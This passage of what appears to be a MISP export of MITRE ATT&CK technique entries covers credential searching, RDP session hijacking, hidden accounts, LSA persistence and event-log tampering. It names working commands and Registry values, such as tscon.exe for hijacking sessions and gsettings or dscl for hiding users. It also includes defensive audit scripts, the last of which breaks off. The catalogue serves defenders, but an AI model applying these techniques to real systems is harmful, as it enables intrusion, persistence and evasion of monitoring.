https://attack.mitre.org/techniques/T1543/002

https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/

https://redcanary.com/blog/attck-t1501-understanding-systemd-service-persistence/

https://www.anomali.com/blog/rocke-evolves-its-arsenal-with-a-new-malware-family-written-in-golang

https://www.freedesktop.org/software/systemd/man/systemd.service.html

https://www.rapid7.com/db/modules/exploit/linux/local/service_persistence

Bash History - T1552.003

Adversaries may search the bash command history on compromised systems for insecurely stored credentials. Bash keeps track of the commands users type on the command-line with the "history" utility. Once a user logs out, the history is flushed to the user’s <code>.bash_history</code> file. For each user, this file resides at the same location: <code>~/.bash_history</code>. Typically, this file keeps track of the user’s last 500 commands. Users often type usernames and passwords on the command-line as parameters to programs, which then get saved to this file when they log out. Adversaries can abuse this by looking through the file for potential credentials. (Citation: External to DA, the OS X Way)

The tag is: misp-galaxy:mitre-attack-pattern="Bash History - T1552.003"

Table 6096. Table References

Links

http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

https://attack.mitre.org/techniques/T1552/003

Code Signing - T1553.002

Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature.

Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning)

Code signing certificates may be used to bypass security policies that require signed code to execute on a system.

The tag is: misp-galaxy:mitre-attack-pattern="Code Signing - T1553.002"

Table 6097. Table References

Links

http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates

https://attack.mitre.org/techniques/T1553/002

https://eclecticlight.co/2020/11/16/checks-on-executable-code-in-catalina-and-big-sur-a-first-draft/

https://en.wikipedia.org/wiki/Code_signing

https://securelist.com/why-you-shouldnt-completely-trust-files-signed-with-digital-certificates/68593/

RDP Hijacking - T1563.002

Adversaries may hijack a legitimate user’s remote desktop session to move laterally within an environment. Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)

Adversaries may perform RDP session hijacking which involves stealing a legitimate user’s remote session. Typically, a user is notified when someone else is trying to steal their session. With System permissions and using Terminal Services Console, <code>c:\windows\system32\tscon.exe [session number to be stolen]</code>, an adversary can hijack a session without the need for credentials or prompts to the user.(Citation: RDP Hijacking Korznikov) This can be done remotely or locally and with active or disconnected sessions.(Citation: RDP Hijacking Medium) It can also lead to [Remote System Discovery](https://attack.mitre.org/techniques/T1018) and Privilege Escalation by stealing a Domain Admin or higher privileged account session. All of this can be done by using native Windows commands, but it has also been added as a feature in red teaming tools.(Citation: Kali Redsnarf)

The tag is: misp-galaxy:mitre-attack-pattern="RDP Hijacking - T1563.002"

Table 6098. Table References

Links

http://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html

https://attack.mitre.org/techniques/T1563/002

https://github.com/nccgroup/redsnarf

https://medium.com/@networksecurity/rdp-hijacking-how-to-hijack-rds-and-remoteapp-sessions-transparently-to-move-through-an-da2a1e73a5f6

https://technet.microsoft.com/en-us/windowsserver/ee236407.aspx

Asymmetric Cryptography - T1573.002

Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.

For efficiency, many protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).

The tag is: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002"

Table 6099. Table References

Links

http://www.sans.org/reading-room/whitepapers/analyst/finding-hidden-threats-decrypting-ssl-34840

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/techniques/T1573/002

https://insights.sei.cmu.edu/cert/2015/03/the-risks-of-ssl-inspection.html

DNS Server - T1583.002

Adversaries may set up their own Domain Name System (DNS) servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of hijacking existing DNS servers, adversaries may opt to configure and run their own DNS servers in support of operations.

By running their own DNS servers, adversaries can have more control over how they administer server-side DNS C2 traffic ([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, adversaries can configure DNS applications to provide conditional responses to malware and, generally, have more flexibility in the structure of the DNS-based C2 channel.(Citation: Unit42 DNS Mar 2019)

The tag is: misp-galaxy:mitre-attack-pattern="DNS Server - T1583.002"

Table 6100. Table References

Links

https://attack.mitre.org/techniques/T1583/002

https://unit42.paloaltonetworks.com/dns-tunneling-how-dns-can-be-abused-by-malicious-actors/

Search Engines - T1593.002

Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typically crawl online sites to index content and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)

Adversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).

The tag is: misp-galaxy:mitre-attack-pattern="Search Engines - T1593.002"

Table 6101. Table References

Links

https://attack.mitre.org/techniques/T1593/002

https://securitytrails.com/blog/google-hacking-techniques

https://www.exploit-db.com/google-hacking-database

Call Log - T1636.002

Adversaries may utilize standard operating system APIs to gather call log data. On Android, this can be accomplished using the Call Log Content Provider. iOS provides no standard API to access the call log.

If the device has been jailbroken or rooted, an adversary may be able to access the [Call Log](https://attack.mitre.org/techniques/T1636/002) without the user’s knowledge or approval.

The tag is: misp-galaxy:mitre-attack-pattern="Call Log - T1636.002"

Table 6102. Table References

Links

https://attack.mitre.org/techniques/T1636/002

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-13.html

TFTP Boot - T1542.005

Adversaries may abuse netbooting to load an unauthorized network device operating system from a Trivial File Transfer Protocol (TFTP) server. TFTP boot (netbooting) is commonly used by network administrators to load configuration-controlled network device images from a centralized management server. Netbooting is one option in the boot sequence and can be used to centralize, manage, and control device images.

Adversaries may manipulate the configuration on the network device specifying use of a malicious TFTP server, which may be used in conjunction with [Modify System Image](https://attack.mitre.org/techniques/T1601) to load a modified image on device startup or reset. The unauthorized image allows adversaries to modify device configuration, add malicious capabilities to the device, and introduce backdoors to maintain control of the network device while minimizing detection through the use of standard functionality. This technique is similar to [ROMMONkit](https://attack.mitre.org/techniques/T1542/004) and may result in the network device running a modified image. (Citation: Cisco Blog Legacy Device Attacks)

The tag is: misp-galaxy:mitre-attack-pattern="TFTP Boot - T1542.005"

Table 6103. Table References

Links

https://attack.mitre.org/techniques/T1542/005

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

https://tools.cisco.com/security/center/resources/integrity_assurance.html#13

https://tools.cisco.com/security/center/resources/integrity_assurance.html#23

https://tools.cisco.com/security/center/resources/integrity_assurance.html#26

https://tools.cisco.com/security/center/resources/integrity_assurance.html#35

https://tools.cisco.com/security/center/resources/integrity_assurance.html#7

Private Keys - T1552.004

Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures.(Citation: Wikipedia Public Key Crypto) Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc.

Adversaries may also look in common key directories, such as <code>~/.ssh</code> for SSH keys on *nix-based systems or <code>C:\Users\(username)\.ssh\</code> on Windows. Adversary tools may also search compromised systems for file extensions relating to cryptographic keys and certificates.(Citation: Kaspersky Careto)(Citation: Palo Alto Prince of Persia)

When a device is registered to Azure AD, a device key and a transport key are generated and used to verify the device’s identity.(Citation: Microsoft Primary Refresh Token) An adversary with access to the device may be able to export the keys in order to impersonate the device.(Citation: AADInternals Azure AD Device Identities)

On network devices, private keys may be exported via [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as <code>crypto pki export</code>.(Citation: cisco_deploy_rsa_keys)

Some private keys require a password or passphrase for operation, so an adversary may also use [Input Capture](https://attack.mitre.org/techniques/T1056) for keylogging or attempt to [Brute Force](https://attack.mitre.org/techniques/T1110) the passphrase off-line. These private keys can be used to authenticate to [Remote Services](https://attack.mitre.org/techniques/T1021) like SSH or for use in decrypting other collected files such as email.
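A defender's counterpart to the search described above, added here as an example (not MISP's or MITRE's code): it walks a directory tree for the key file extensions and the <code>.ssh</code> location named in the text and reports private keys that carry no passphrase or that other local users can read. The files it creates are constructed stand-ins with dummy contents, not real keys.

```python
"""Audit a directory tree for private keys stored insecurely, using the file
extensions and the ~/.ssh location listed above: keys with no passphrase
(PEM, OpenSSH and PuTTY formats) and key files readable by other users.

Added example for illustration; not MISP's or MITRE's code. The files it
creates are constructed stand-ins with dummy contents, not real keys.
"""
import base64
import os
import stat
import struct
import tempfile
from pathlib import Path

KEY_EXTENSIONS = {".key", ".pgp", ".gpg", ".ppk", ".p12", ".pem", ".pfx",
                  ".cer", ".p7b", ".asc"}
OPENSSH_MAGIC = b"openssh-key-v1\x00"


def openssh_cipher(data: bytes):
    """Cipher name inside an OpenSSH-format key ("none" = no passphrase), else None."""
    lines = data.strip().splitlines()
    if not lines or lines[0] != b"-----BEGIN OPENSSH PRIVATE KEY-----":
        return None
    blob = base64.b64decode(b"".join(lines[1:-1]))
    off = len(OPENSSH_MAGIC)
    if not blob.startswith(OPENSSH_MAGIC) or len(blob) < off + 4:
        return None
    (n,) = struct.unpack(">I", blob[off:off + 4])
    return blob[off + 4:off + 4 + n].decode("ascii", "replace")


def classify_key_file(path: Path) -> dict:
    """Per-file findings: private key or not, passphrase-protected or not, readable by others."""
    data = path.read_bytes()[:4096]  # every header we look at sits at the top of the file
    is_pem = b"PRIVATE KEY-----" in data
    is_ppk = data.startswith(b"PuTTY-User-Key-File-")
    cipher = openssh_cipher(data)
    if cipher is not None:
        encrypted = cipher != "none"
    elif is_pem:  # PKCS#8 and legacy PEM keys announce encryption in their headers
        encrypted = b"ENCRYPTED PRIVATE KEY-----" in data or b"Proc-Type: 4,ENCRYPTED" in data
    elif is_ppk:
        encrypted = b"Encryption: none" not in data
    else:
        encrypted = False
    mode = path.stat().st_mode
    return {
        "path": str(path),
        "private_key": is_pem or is_ppk,
        "encrypted": encrypted,
        "readable_by_others": bool(mode & (stat.S_IRGRP | stat.S_IROTH)),
    }


def find_insecure_keys(root) -> list:
    """Walk root; return private keys that lack a passphrase or are readable by others."""
    findings = []
    for p in sorted(Path(root).rglob("*")):
        if not p.is_file():
            continue
        if p.suffix.lower() not in KEY_EXTENSIONS and p.parent.name != ".ssh":
            continue
        f = classify_key_file(p)
        if f["private_key"] and (not f["encrypted"] or f["readable_by_others"]):
            findings.append(f)
    return findings


def demo() -> list:
    """Populate a temp dir with constructed files and return the findings on them."""
    root = Path(tempfile.mkdtemp())
    (root / ".ssh").mkdir()
    # Constructed OpenSSH blob: magic + cipher "none"; a real key carries much more.
    blob = OPENSSH_MAGIC + struct.pack(">I", 4) + b"none" + b"\x00" * 16
    (root / ".ssh" / "id_ed25519").write_bytes(
        b"-----BEGIN OPENSSH PRIVATE KEY-----\n" + base64.encodebytes(blob)
        + b"-----END OPENSSH PRIVATE KEY-----\n")
    os.chmod(root / ".ssh" / "id_ed25519", 0o600)      # private, but no passphrase
    (root / "server.key").write_bytes(
        b"-----BEGIN ENCRYPTED PRIVATE KEY-----\nAAAA\n-----END ENCRYPTED PRIVATE KEY-----\n")
    os.chmod(root / "server.key", 0o644)               # passphrase, but world-readable
    (root / "backup.ppk").write_bytes(b"PuTTY-User-Key-File-2: ssh-rsa\nEncryption: none\n")
    os.chmod(root / "backup.ppk", 0o600)               # no passphrase
    (root / "site.cer").write_bytes(b"-----BEGIN CERTIFICATE-----\nAAAA\n-----END CERTIFICATE-----\n")
    return find_insecure_keys(root)                    # site.cer is public material: not reported


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```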

The tag is: misp-galaxy:mitre-attack-pattern="Private Keys - T1552.004"

Table 6104. Table References

Links

https://aadinternals.com/post/deviceidentity/

https://attack.mitre.org/techniques/T1552/004

https://en.wikipedia.org/wiki/Public-key_cryptography

https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask_v1.0.pdf

https://learn.microsoft.com/en-us/azure/active-directory/devices/concept-primary-refresh-token

https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/sec_conn_pki/configuration/xe-17/sec-pki-xe-17-book/sec-deploy-rsa-pki.html#GUID-1CB802D8-9DE3-447F-BECE-CF22F5E11436

Hidden Users - T1564.002

Adversaries may use hidden users to hide the presence of user accounts they create or modify. Administrators may want to hide users when there are many user accounts on a given system or if they want to hide their administrative or other management accounts from other users.

In macOS, adversaries can create or modify a user to be hidden through manipulating plist files, folder attributes, and user attributes. To prevent a user from being shown on the login screen and in System Preferences, adversaries can set the userID to be under 500 and set the key value <code>Hide500Users</code> to <code>TRUE</code> in the <code>/Library/Preferences/com.apple.loginwindow</code> plist file.(Citation: Cybereason OSX Pirrit) Every user has a userID associated with it. When the <code>Hide500Users</code> key value is set to <code>TRUE</code>, users with a userID under 500 do not appear on the login screen and in System Preferences. Using the command line, adversaries can use the <code>dscl</code> utility to create hidden user accounts by setting the <code>IsHidden</code> attribute to <code>1</code>. Adversaries can also hide a user’s home folder by setting its hidden flag with <code>chflags</code>.(Citation: Apple Support Hide a User Account)

Adversaries may similarly hide user accounts in Windows. Adversaries can set the <code>HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList</code> Registry key value to <code>0</code> for a specific user to prevent that user from being listed on the logon screen.(Citation: FireEye SMOKEDHAM June 2021)(Citation: US-CERT TA18-074A)

On Linux systems, adversaries may hide user accounts from the login screen, also referred to as the greeter. The method an adversary may use depends on which Display Manager the distribution is currently using. For example, on an Ubuntu system using the GNOME Display Manager (GDM), accounts may be hidden from the greeter using the <code>gsettings</code> command (ex: <code>sudo -u gdm gsettings set org.gnome.login-screen disable-user-list true</code>).(Citation: Hide GDM User Accounts) Display Managers are not anchored to specific distributions and may be changed by a user or adversary.

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Users - T1564.002"

Table 6105. Table References

Links

https://attack.mitre.org/techniques/T1564/002

https://cdn2.hubspot.net/hubfs/3354902/Content%20PDFs/Cybereason-Lab-Analysis-OSX-Pirrit-4-6-16.pdf

https://support.apple.com/en-us/HT203998

https://ubuntuhandbook.org/index.php/2021/06/hide-user-accounts-ubuntu-20-04-login-screen/

https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html

https://www.us-cert.gov/ncas/alerts/TA18-074A

Authentication Package - T1547.002

Adversaries may abuse authentication packages to execute DLLs when the system boots. Windows authentication package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system.(Citation: MSDN Authentication Packages)

Adversaries can use the autostart mechanism provided by LSA authentication packages for persistence by placing a reference to a binary in the Windows Registry location <code>HKLM\SYSTEM\CurrentControlSet\Control\Lsa\</code> with the key value of <code>"Authentication Packages"=<target binary></code>. The binary will then be executed by the system when the authentication packages are loaded.

The tag is: misp-galaxy:mitre-attack-pattern="Authentication Package - T1547.002"

Table 6106. Table References

Links

http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html

https://attack.mitre.org/techniques/T1547/002

https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx

https://technet.microsoft.com/en-us/library/dn408187.aspx

DNS Server - T1584.002

Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.

By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization’s traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)

The tag is: misp-galaxy:mitre-attack-pattern="DNS Server - T1584.002"

Table 6107. Table References

Links

https://attack.mitre.org/techniques/T1584/002

https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html

https://blogs.cisco.com/security/talos/angler-domain-shadowing

https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/

https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html

https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows

Client Configurations - T1592.004

Adversaries may gather information about the victim’s client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) (ex: listening ports, server banners, user agent strings) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Adversaries may also compromise sites then include malicious content designed to collect host information from visitors.(Citation: ATT ScanBox) Information about the client configurations may also be exposed to adversaries via online or other accessible data sets (ex: job postings, network maps, assessment reports, resumes, or purchase invoices). Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Supply Chain Compromise](https://attack.mitre.org/techniques/T1195) or [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Client Configurations - T1592.004"

Table 6108. Table References

Links

https://attack.mitre.org/techniques/T1592/004

https://cybersecurity.att.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks

https://threatconnect.com/blog/infrastructure-research-hunting/

Reflection Amplification - T1498.002

Adversaries may attempt to cause a denial of service (DoS) by reflecting a high volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that will respond to requests bearing a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.

Reflection attacks often take advantage of protocols with larger responses than requests in order to amplify their traffic, commonly known as a Reflection Amplification attack. Adversaries may be able to generate an increase in volume of attack traffic that is several orders of magnitude greater than the requests sent to the amplifiers. The extent of this increase depends upon many variables, such as the protocol in question, the technique used, and the amplifying servers that actually produce the amplification in attack volume. Two prominent protocols that have enabled Reflection Amplification Floods are DNS(Citation: Cloudflare DNSamplficationDoS) and NTP(Citation: Cloudflare NTPamplifciationDoS), though the use of several others in the wild has been documented.(Citation: Arbor AnnualDoSreport Jan 2018) In particular, the memcache protocol showed itself to be a powerful protocol, with amplification sizes up to 51,200 times the requesting packet.(Citation: Cloudflare Memcrashed Feb 2018)

The tag is: misp-galaxy:mitre-attack-pattern="Reflection Amplification - T1498.002"

Table 6109. Table References

Links

https://attack.mitre.org/techniques/T1498/002

https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/

https://blog.cloudflare.com/reflections-on-reflections/

https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf

https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf

https://www.cloudflare.com/learning/ddos/dns-amplification-ddos-attack/

https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/

Securityd Memory - T1555.002

An adversary who obtains root access (allowing them to read securityd’s memory) can then scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain)(Citation: OSX Keydnap malware)

In OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords.(Citation: OS X Keychain)(Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an adversary need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)

The tag is: misp-galaxy:mitre-attack-pattern="Securityd Memory - T1555.002"

Table 6110. Table References

Links

http://juusosalonen.com/post/30923743427/breaking-into-the-os-x-keychain

http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way

https://attack.mitre.org/techniques/T1555/002

https://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/

Container API - T1552.007

Adversaries may gather credentials via APIs within a container environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components.(Citation: Docker API)(Citation: Kubernetes API)

An adversary may access the Docker API to collect logs that contain credentials to cloud, container, and various other resources in the environment.(Citation: Unit 42 Unsecured Docker Daemons) An adversary with sufficient permissions, such as via a pod’s service account, may also use the Kubernetes API to retrieve credentials from the Kubernetes API server. These credentials may include those needed for Docker API authentication or secrets from Kubernetes cluster components.

The tag is: misp-galaxy:mitre-attack-pattern="Container API - T1552.007"

Table 6111. Table References

Links

https://attack.mitre.org/techniques/T1552/007

https://docs.docker.com/engine/api/v1.41/

https://kubernetes.io/docs/concepts/overview/kubernetes-api/

https://unit42.paloaltonetworks.com/attackers-tactics-and-techniques-in-unsecured-docker-daemons-revealed/

Email Accounts - T1585.002

Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)

To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)

The tag is: misp-galaxy:mitre-attack-pattern="Email Accounts - T1585.002"

Table 6112. Table References

Links

https://attack.mitre.org/techniques/T1585/002

https://blog.trendmicro.com/trendlabs-security-intelligence/r980-ransomware-disposable-email-service/

https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf

Chat Messages - T1552.008

Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels.

Rather than accessing the stored chat logs (i.e., [Credentials In Files](https://attack.mitre.org/techniques/T1552/001)), adversaries may directly access credentials within these services on the user endpoint, through servers hosting the services, or through administrator portals for cloud hosted services. Adversaries may also compromise integration tools like Slack Workflows to automatically search through messages to extract user credentials. These credentials may then be abused to perform follow-on activities such as lateral movement or privilege escalation (Citation: Slack Security Risks).

The tag is: misp-galaxy:mitre-attack-pattern="Chat Messages - T1552.008"

Table 6113. Table References

Links

https://attack.mitre.org/techniques/T1552/008

https://www.nightfall.ai/blog/saas-slack-security-risks-2020

Silver Ticket - T1558.002

Adversaries who have the password hash of a target service account (e.g. SharePoint, MSSQL) may forge Kerberos ticket granting service (TGS) tickets, also known as silver tickets. Kerberos TGS tickets are also known as service tickets.(Citation: ADSecurity Silver Tickets)

Silver tickets are more limited in scope than golden tickets in that they only enable adversaries to access a particular resource (e.g. MSSQL) and the system that hosts the resource; however, unlike golden tickets, adversaries with the ability to forge silver tickets are able to create TGS tickets without interacting with the Key Distribution Center (KDC), potentially making detection more difficult.(Citation: ADSecurity Detecting Forged Tickets)

Password hashes for target services may be obtained using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or [Kerberoasting](https://attack.mitre.org/techniques/T1558/003).

The tag is: misp-galaxy:mitre-attack-pattern="Silver Ticket - T1558.002"

Table 6114. Table References

Links

https://adsecurity.org/?p=1515

https://adsecurity.org/?p=2011

https://attack.mitre.org/techniques/T1558/002

https://medium.com/threatpunter/detecting-attempts-to-steal-passwords-from-memory-558f16dce4ea

Vulnerability Scanning - T1595.002

Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.

These scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).

The tag is: misp-galaxy:mitre-attack-pattern="Vulnerability Scanning - T1595.002"

Table 6115. Table References

Links

https://attack.mitre.org/techniques/T1595/002

https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-014_Vulnerability_Scanning

Indicator Blocking - T1562.006

An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting(Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW)(Citation: Microsoft About Event Tracing 2018), by tampering with settings that control the collection and flow of event telemetry.(Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).

For example, adversaries may modify the File value in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security</code> to hide their malicious actions in a new or different .evtx log file. This action does not require a system reboot and takes effect immediately.(Citation: disable_win_evt_logging)

ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) <code>Set-EtwTraceProvider</code> cmdlet or by interfacing directly with the Registry to make alterations.

In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products.

In Linux environments, adversaries may disable or reconfigure log processing tools such as syslog or nxlog to inhibit detection and monitoring capabilities to facilitate follow-on behaviors (Citation: LemonDuck).
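The Hidden Users, Authentication Package and Indicator Blocking entries above each name a Registry location an adversary edits. The following added example (not MISP's or MITRE's code) parses a <code>reg.exe</code>-style export and flags all three at once: a <code>SpecialAccounts\UserList</code> value of 0, an LSA "Authentication Packages" entry beyond the expected one, and a Security event log <code>File</code> value pointing away from its default location. The sample export is constructed, and the two baselines (<code>msv1_0</code> as the stock package, the log under <code>Winevt\Logs</code>) are assumptions for this example.

```python
"""Audit a Registry export for the three settings described above: hidden
logon accounts, extra LSA authentication packages and a relocated Security log.

Added example, not MISP's or MITRE's code. SAMPLE_EXPORT is constructed; the
baselines EXPECTED_AUTH_PACKAGES and EXPECTED_SECLOG_FILE are assumptions.
"""
import re

USERLIST_KEY = (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion"
                r"\Winlogon\SpecialAccounts\UserList")
LSA_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa"
SECLOG_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security"
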